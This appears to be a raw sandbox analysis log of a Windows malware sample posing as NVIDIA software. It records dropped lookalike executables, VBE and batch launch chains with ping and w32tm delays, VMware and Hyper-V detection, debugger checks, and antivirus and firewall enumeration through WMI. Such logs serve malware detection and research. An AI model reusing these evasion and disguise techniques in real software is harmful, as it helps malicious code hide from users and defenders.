Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0100A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0100A69B
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0102B348 FindFirstFileExA,	0_2_0102B348
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0101C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0101C220

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

Code function: 0_2_0101E6A3 VirtualQuery,GetSystemInfo,

0_2_0101E6A3

Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: wscript.exe, 00000002.00000003.2077926950.0000000002F97000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}o
Source: hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2723949937.000000001BD63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_
Source: NVIDIAShare.exe.bin.exe, 00000000.00000003.2043014739.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2588332013.000000001AEDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: w32tm.exe, 00000019.00000002.2332217079.0000020462C99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.3016384197.000000001B275000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_@
Source: NVIDIAShare.exe.bin.exe, 00000000.00000003.2043708534.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2505625184.000000001B078000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
Source: w32tm.exe, 00000033.00000002.2819927013.000001E784619000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
Source: NVIDIA Container.exe, 00000005.00000002.2122064011.000000001C728000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2161092207.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000D.00000002.2162527839.0000021044348000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2281901229.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2378553906.000000001AE50000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000024.00000002.2530564345.0000025014BF7000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2557499161.0000000000828000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2723949937.000000001BCA0000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002E.00000002.2738531350.0000023A7776B000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002F.00000002.2802934915.000000001B430000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2892138201.000000001B54F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

API call chain: ExitProcess graph end node

graph_0-24032

Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

Code function: 0_2_0101F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0101F838

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

Code function: 0_2_01027DEE mov eax, dword ptr fs:[00000030h]

0_2_01027DEE

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

Code function: 0_2_0102C030 GetProcessHeap,

0_2_0102C030

Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0101F9D5 SetUnhandledExceptionFilter,	0_2_0101F9D5
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0101F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0101F838
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0101FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0101FBCA
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_01028EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_01028EBD

Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\NVIDIA\RbwXTgCxu.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe "C:\Users\user\AppData\Roaming\NVIDIA/NVIDIA Container.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vPPPhWVNfR.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1LArpmQ7xZ.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cMdeBf80Aw.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B0uJAwGmBV.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sxRqhXCXyo.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ij3ogloIkp.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1QWUF8ga47.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FuUFRpewDb.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\L4pr7KvdK9.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

Code function: 0_2_01010723 cpuid

0_2_01010723

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0101AF0F

Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Queries volume information: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

Code function: 0_2_0101DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_0101DF1E

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

Code function: 0_2_0100B146 GetVersionExW,

0_2_0100B146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2177670129.000000001B37E000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2307191010.000000001B4CC000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2378553906.000000001AE50000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2478981133.0000000000B1D000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2505625184.000000001B0D2000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2588332013.000000001AE64000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2588332013.000000001AE44000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2723949937.000000001BD34000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2723949937.000000001BCA0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
